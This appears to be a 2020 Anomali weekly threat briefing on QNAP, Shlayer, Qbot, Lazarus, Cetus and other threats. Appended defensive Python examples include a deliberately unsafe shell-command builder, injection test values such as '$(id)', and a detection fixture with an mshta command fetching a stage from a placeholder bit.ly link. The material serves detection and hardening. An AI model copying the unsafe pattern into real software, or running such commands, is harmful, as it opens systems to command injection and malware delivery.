September 2, 2020 - Anomali Threat Research

Weekly Threat Briefing: Malware, Lazarus Group, Vulnerabilities and More

<div id="weekly">
<p id="intro">The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics:<b> APT, Cryptojacking, DDoS, North Korea, Shlayer, Trojan, </b> and <b> Vulnerabilities</b>. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. <img src="https://cdn.filestackcontent.com/iE2TgATbSAjPPrSWCo9w"/><br/> <b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b></p>
<div id="trending-threats">
<h2 id="trendingthreats">Trending Cyber News and Threat Intelligence</h2>
<h3 id="article-1" style="margin-bottom:0;"><a href="https://blog.netlab.360.com/in-the-wild-qnap-nas-attacks-en/" target="_blank"><b>In The Wild QNAP NAS Attacks</b></a></h3>
<p>(published: August 31, 2020)</p>
<p>Netlab 360 has identified a new QNAP NAS vulnerability that, if exploited, allows unauthorized remote command execution. Because an executable on the device does not sanitize its input, a threat actor can inject commands through that input. QNAP claims to have fixed the vulnerability; however, attacks are still being observed in the wild. The purpose of the attacks is currently unknown, and no bots have yet been observed being implanted.<br/> <b>Recommendation:</b> Users should immediately check and update their firmware. Last month, QNAP users were strongly encouraged to update their software because of an ongoing eCh0raix ransomware campaign.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947217">[MITRE ATT&amp;CK] Exploitation of Remote Services - T1210</a><br/> <b>Tags:</b> Remote command execution, QNAP, Vulnerability</p>
<h3 id="article-2" style="margin-bottom:0;"><a href="https://www.bleepingcomputer.com/news/security/malware-authors-trick-apple-into-trusting-malicious-shlayer-apps/" target="_blank"><b>Malware Authors Trick Apple into Trusting Malicious Shlayer Apps</b></a></h3>
<p>(published: August 31, 2020)</p>
<p>The authors of the “Shlayer” malware have been able to bypass Apple’s notarization process. Apple requires all Mac software distributed outside the App Store to be submitted to this automated scan, which is meant to identify malicious software. The threat actors behind Shlayer passed these checks, with the notarized malicious software being hosted on Homebrew and executed on victims’ computers. The authors are also dropping a persistent Bundlore variant. While Apple has revoked the certificates, more samples have appeared in recent days.<br/> <b>Recommendation:</b> According to a Kaspersky report, Shlayer malware has attacked over 10% of Mac computers. Always run antivirus and endpoint protection software to assist in preventing malware infection.<br/> <b>Tags:</b> Apple, App Store, Malware, Mac, Mac Malware, Shlayer</p>
<h3 id="article-3" style="margin-bottom:0;"><a href="https://www.bleepingcomputer.com/news/security/cisco-warns-of-actively-exploited-bug-in-carrier-grade-routers/" target="_blank"><b>Cisco Warns of Actively Exploited Bug in Carrier-Grade Routers</b></a></h3>
<p>(published: August 31, 2020)</p>
<p>A vulnerability in Cisco’s IOS XR software, registered as “CVE-2020-3566,” was identified by the company’s incident response team when attempts to exploit it were observed on August 28, 2020. CVE-2020-3566 affects the Distance Vector Multicast Routing Protocol (DVMRP) and, if exploited, could allow a remote threat actor to conduct a Denial of Service (DoS) attack.<br/> <b>Recommendation:</b> At the time of this writing there is no patch for this vulnerability; however, administrators can apply workarounds while a fix is being developed. Steps include rate-limiting IGMP traffic, which increases the time a successful exploitation would take, and creating a new ACL that blocks inbound DVMRP traffic on any interface with multicast routing enabled.<br/> <b>Tags:</b> Vulnerability, DoS, CVE-2020-3566, Cisco</p>
<h3 id="article-4" style="margin-bottom:0;"><a href="https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/" target="_blank"><b>Qbot Trojan Targets Outlook Threads</b></a></h3>
<p>(published: August 28, 2020)</p>
<p>The actor(s) behind the Qbot banking trojan have deployed a new version of the malware that uses hijacked Outlook email threads to create personalized phishing emails. Researchers from Check Point released a report detailing an ongoing Qbot campaign that has been active since March 2020 and has targeted over 10,000 victims worldwide, including in the US, Italy, Israel, and India. The attacks begin with phishing emails sent to the victim’s Outlook inbox. These emails contain a ZIP file or a URL; once the attachment or link is executed, Qbot is downloaded. The malware then activates its new feature, dubbed the “email collector module,” which extracts all email threads from the victim’s Outlook inbox for use in future phishing campaigns. Qbot is then able to steal device information, conduct banking transactions, and act as a dropper for other malware.<br/> <b>Recommendation:</b> Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. This makes it easier to spot unusual traffic and connections to and from your network and so identify potentially malicious activity. Furthermore, ensure that your employees are educated about the risks of opening attachments, particularly from unknown senders and any attachment that requests macros to be enabled.<br/> <b>Tags:</b> qbot, trojan, outlook, phishing, spearphishing</p>
<h3 id="article-5" style="margin-bottom:0;"><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-239a" target="_blank"><b>CISA Warns of Increase in North Korean Bank Heists</b></a></h3>
<p>(published: August 28, 2020)</p>
<p>CISA, in joint alert AA20-239A, warns of an increase in bank heists by the North Korean actors tracked as BeagleBoyz, a group linked to the Lazarus Group.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947267">[MITRE ATT&amp;CK] Drive-by Compromise - T1189</a> | <a href="https://ui.threatstream.com/ttp/947138">[MITRE ATT&amp;CK] Exploit Public-Facing Application - T1190</a> | <a href="https://ui.threatstream.com/ttp/947094">[MITRE ATT&amp;CK] External Remote Services - T1133</a> | <a href="https://ui.threatstream.com/ttp/947191">[MITRE ATT&amp;CK] Command-Line Interface - T1059</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a><br/> <b>Tags:</b> CISA, beagleboyz, APT, lazarus, ta505</p>
<h3 id="article-6" style="margin-bottom:0;"><a href="https://www.zdnet.com/article/ddos-extortionists-target-nzx-moneygram-braintree-and-other-financial-services/#ftag=RSSbaffb68" target="_blank"><b>DDoS Extortionists Target NZX, MoneyGram, Braintree, and Other Financial Services</b></a></h3>
<p>(published: August 27, 2020)</p>
<p>A cybercriminal group is currently launching DDoS attacks against some of the world's biggest financial service providers and demanding bitcoin payments as extortion fees to stop the attacks. The criminals are using well-known threat actor names such as Fancy Bear and Armada Collective and sending ransom letters to their targets. The group currently targets multiple sectors, including banking and finance, as well as retail. Recent victims of the group include the New Zealand stock exchange (NZX), MoneyGram, YesBank India, PayPal, Braintree, and Venmo. According to Akamai, some of the recent DDoS attacks peaked at almost 200 Gb/sec and used a variety of attack vectors.<br/> <b>Recommendation:</b> It is highly recommended not to give in to these extortion attempts; rather than paying the attackers, companies should engage DDoS mitigation services. Organizations should develop a DDoS prevention plan based on a thorough security assessment.<br/> <b>Tags:</b> DDoS, extortions</p>
<h3 id="article-7" style="margin-bottom:0;"><a href="https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/" target="_blank"><b>Cetus: Cryptojacking Worm Targeting Docker Daemons</b></a></h3>
<p>(published: August 27, 2020)</p>
<p>Researchers from Unit 42 discovered a new cryptomining worm named “Cetus” that infects unsecured Docker daemons with an XMRig cryptominer payload. Cetus disguises itself as Portainer, a legitimate binary frequently used in Docker environments. When taking over a new machine, Cetus copies itself to the victim’s Docker daemon and deploys the XMRig payload. Cetus uses Masscan to randomly scan subnets for Docker daemons and, once it finds one, tries to spread by sending requests to the daemon’s REST API. Cetus is a simple worm that does not use any anti-debugging or obfuscation techniques to evade security products.<br/> <b>Recommendation:</b> Never expose a Docker daemon to the internet without a proper authentication mechanism. Note that by default the Docker Engine (CE) is NOT exposed to the internet. Organizations are advised to use firewall rules to restrict incoming traffic to a small set of sources. Pulling Docker images from unknown registries or unknown user namespaces is not recommended.<br/> <b>Tags:</b> Cetus, cryptomining, docker</p>
<h3 id="article-8" style="margin-bottom:0;"><a href="https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical/" target="_blank"><b>Lazarus Group: Campaign Targeting the Cryptocurrency Vertical</b></a></h3>
<p>(published: August 25, 2020)</p>
<p>F-Secure Labs has released a tactical report on a campaign by the Lazarus threat actor group targeting cryptocurrency companies. According to F-Secure, Lazarus targeted system administrators at these companies with phishing documents posing as job applications, delivered via LinkedIn. The document included a macro that, once executed, would create a link (.lnk) file that uses “mshta.exe” to download the next stage from a “bit.ly” URL. The backdoors used in the campaign are very similar to tools the group has previously used.<br/> <b>Recommendation:</b> Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&amp;CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/947145">[MITRE ATT&amp;CK] Signed Binary Proxy Execution - T1218</a> | <a href="https://ui.threatstream.com/ttp/947191">[MITRE ATT&amp;CK] Command-Line Interface - T1059</a> | <a href="https://ui.threatstream.com/ttp/947127">[MITRE ATT&amp;CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947194">[MITRE ATT&amp;CK] Indicator Removal on Host - T1070</a> | <a href="https://ui.threatstream.com/ttp/947142">[MITRE ATT&amp;CK] Process Injection - T1055</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947166">[MITRE ATT&amp;CK] Modify Registry - T1112</a> | <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947162">[MITRE ATT&amp;CK] Remote Services - T1021</a> | <a href="https://ui.threatstream.com/ttp/947195">[MITRE ATT&amp;CK] File and Directory Discovery - T1083</a> | <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol - T1071</a><br/> <b>Tags:</b> APT, Lazarus, Cryptocurrency, Phishing, LinkedIn</p>
<h3 id="article-9" style="margin-bottom:0;"><a href="https://securelist.com/deathstalker-mercenary-triumvirate/98177" target="_blank"><b>Lifting the Veil on DeathStalker, a Mercenary Triumvirate</b></a></h3>
<p>(published: August 24, 2020)</p>
<p>Researchers at Kaspersky Labs have released a report on a new threat actor that they have named “DeathStalker”. The group mainly targets companies in the financial sector and law firms. The targeting of financial sector companies does not appear to be motivated by financial gain; instead, DeathStalker acts more as a hacker-for-hire group focused on acquiring sensitive business information from its victims.<br/> <b>Recommendation:</b> Defense-in-depth is the best way to ensure safety from APTs. Defense-in-depth involves the layering of defense mechanisms. This can include network and endpoint security, social engineering training for staff (such as exercises to help detect phishing emails), and robust threat intelligence capabilities.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/947191">[MITRE ATT&amp;CK] Command-Line Interface - T1059</a><br/> <b>Tags:</b> APT, DeathStalker, hacker-for-hire</p>
</div>
</div>
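The QNAP entry above describes the defect class behind the vulnerability: an executable that passes unsanitized input to a shell. The following Python is an added example, not QNAP's code and not from the Netlab 360 report; it places the defective pattern next to a hardened one. The "ping a host" feature and all function names are assumptions chosen for illustration.

```python
import re
import subprocess

# Allowlist for a hostname or dotted IPv4 address: labels of letters, digits and
# hyphens, no leading or trailing hyphen, joined by dots, at most 253 characters.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def build_command_unsafe(host: str) -> str:
    """Defective pattern: untrusted input pasted into a string that a shell will parse.

    Any shell metacharacter in `host` changes what the shell executes; this is the
    class of defect the QNAP entry describes (an executable that does not sanitize
    its input). Shown for contrast only; never run the result through a shell.
    """
    return f"ping -c 1 {host}"


def validate_host(host: str) -> str:
    """Reject anything that is not a plain hostname or IPv4 address."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"host rejected by allowlist: {host!r}")
    return host


def build_command_safe(host: str) -> list:
    """Hardened pattern: allowlist validation, then an argv list that no shell parses."""
    return ["ping", "-c", "1", validate_host(host)]


def is_accepted(host: str) -> bool:
    """True if the input passes validation; handy for request handlers and tests."""
    try:
        validate_host(host)
    except ValueError:
        return False
    return True


def run_safe(host: str, timeout: float = 5.0) -> int:
    """Execute the hardened command with shell=False and return ping's exit status."""
    proc = subprocess.run(build_command_safe(host), shell=False,
                          capture_output=True, timeout=timeout)
    return proc.returncode


if __name__ == "__main__":
    for candidate in ["example.com", "192.0.2.1", "example.com;id", "$(id)", "-c"]:
        print(f"{candidate!r:22} accepted={is_accepted(candidate)}")
```

The two defenses are independent: the allowlist keeps metacharacters out of the argument, and passing an argv list with `shell=False` means that even a weaker validator would not hand the input to a shell parser.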
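The Cetus entry above warns against exposing a Docker daemon without authentication, against binding it to the internet without firewalling, and against pulling from unknown registries. The following Python is an added example, not Unit 42's code and not part of Docker: an offline audit of a `daemon.json` that flags exactly those three conditions. The keys it reads (`hosts`, `tls`, `tlsverify`, `insecure-registries`) are real dockerd settings; the three sample configurations are constructed for this example.

```python
import json
from urllib.parse import urlsplit

# Bind addresses that expose a listener on every interface.
ANY_ADDR = {"", "0.0.0.0", "::"}


def audit_daemon_config(cfg: dict) -> list:
    """Return findings for a parsed daemon.json; an empty list means nothing was flagged."""
    findings = []
    hosts = cfg.get("hosts", ["unix:///var/run/docker.sock"])  # dockerd's default listener
    tlsverify = bool(cfg.get("tlsverify", False))
    tls_only = bool(cfg.get("tls", False)) and not tlsverify

    for h in hosts:
        u = urlsplit(h)
        if u.scheme != "tcp":
            continue  # unix:// and npipe:// sockets are protected by filesystem permissions
        bind = u.hostname or ""
        if not tlsverify:
            note = (" (tls=true only encrypts the session; it does not authenticate clients)"
                    if tls_only else "")
            findings.append({"severity": "critical", "host": h,
                             "issue": "TCP API listener without TLS client-certificate verification" + note})
        if bind in ANY_ADDR:
            findings.append({"severity": "high" if tlsverify else "critical", "host": h,
                             "issue": "listener bound to all interfaces; restrict sources with firewall rules"})

    for reg in cfg.get("insecure-registries", []):
        findings.append({"severity": "medium", "host": reg,
                         "issue": "insecure registry permits plaintext or unverified image pulls"})
    return findings


def audit_daemon_json(text: str) -> list:
    """Parse daemon.json text and audit it."""
    return audit_daemon_config(json.loads(text))


# Constructed sample configurations (not taken from any real host).
WEAK_CONFIG = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
PARTIAL_CONFIG = ('{"hosts": ["tcp://[::]:2376"], "tls": true, '
                  '"tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}')
HARDENED_CONFIG = ('{"hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"], '
                   '"tlsverify": true, "tlscacert": "/etc/docker/ca.pem", '
                   '"tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}')

if __name__ == "__main__":
    for name, text in [("weak", WEAK_CONFIG), ("partial", PARTIAL_CONFIG), ("hardened", HARDENED_CONFIG)]:
        print(name, audit_daemon_json(text) or "no findings")
```

Run it against `/etc/docker/daemon.json` on each host, remembering that `hosts` can also be set on the dockerd command line or in the systemd unit, so an empty finding list from the file alone is not proof that no TCP listener exists.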
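The Lazarus entry above describes a chain of a macro creating a link file that runs `mshta.exe` to fetch the next stage from a `bit.ly` URL. The following Python is an added example, not F-Secure's code, showing detection logic for that chain run over constructed Sysmon-style process-creation and file-creation events. The field names follow Sysmon's `ProcessCreate` and `FileCreate` events; the sample events, paths and the placeholder short link are constructed for this example.

```python
import re
from urllib.parse import urlsplit

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "is.gd"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _rule_office_wrote_lnk(ev: dict):
    """An Office process writing a .lnk file is the first link in the described chain."""
    if ev.get("EventType") != "FileCreate":
        return None
    if (_basename(ev.get("Image", "")) in OFFICE_APPS
            and ev.get("TargetFilename", "").lower().endswith(".lnk")):
        return {"rule": "office_wrote_lnk", "technique": "T1204", "severity": "medium",
                "reasons": ["Office application created a shortcut file"]}
    return None


def _rule_mshta(ev: dict):
    """mshta.exe fetching a remote URL, or spawned by Office, is signed-binary proxy execution."""
    if ev.get("EventType") != "ProcessCreate" or _basename(ev.get("Image", "")) != "mshta.exe":
        return None
    reasons, severity = [], "medium"
    m = URL_RE.search(ev.get("CommandLine", ""))
    if m:
        host = (urlsplit(m.group(0)).hostname or "").lower()
        if host in URL_SHORTENERS:
            reasons.append(f"downloads next stage from URL shortener {host}")
            severity = "high"
        else:
            reasons.append("executes content from a remote URL")
    if _basename(ev.get("ParentImage", "")) in OFFICE_APPS:
        reasons.append("spawned by an Office application")
        severity = "high"
    if not reasons:
        return None
    return {"rule": "mshta_proxy_execution", "technique": "T1218.005",
            "severity": severity, "reasons": reasons}


RULES = (_rule_office_wrote_lnk, _rule_mshta)


def detect(events: list) -> list:
    """Run every rule over every event; each alert carries the index of the event that fired it."""
    alerts = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append(dict(hit, event=idx))
    return alerts


# Constructed sample events (not real telemetry). Event 0 and 1 model the described
# chain; events 2 and 3 are benign activity that must not fire.
SAMPLE_EVENTS = [
    {"EventType": "FileCreate",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "TargetFilename": r"C:\Users\admin\AppData\Local\Temp\update.lnk"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://bit.ly/PLACEHOLDER-shortlink",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\VendorTool\help.hta"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The two rules fire on different stages of the chain, so an analyst sees the shortcut being written by Office before the `mshta.exe` download runs; correlating both on one host within a short window is what lifts the combined confidence above either rule alone.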
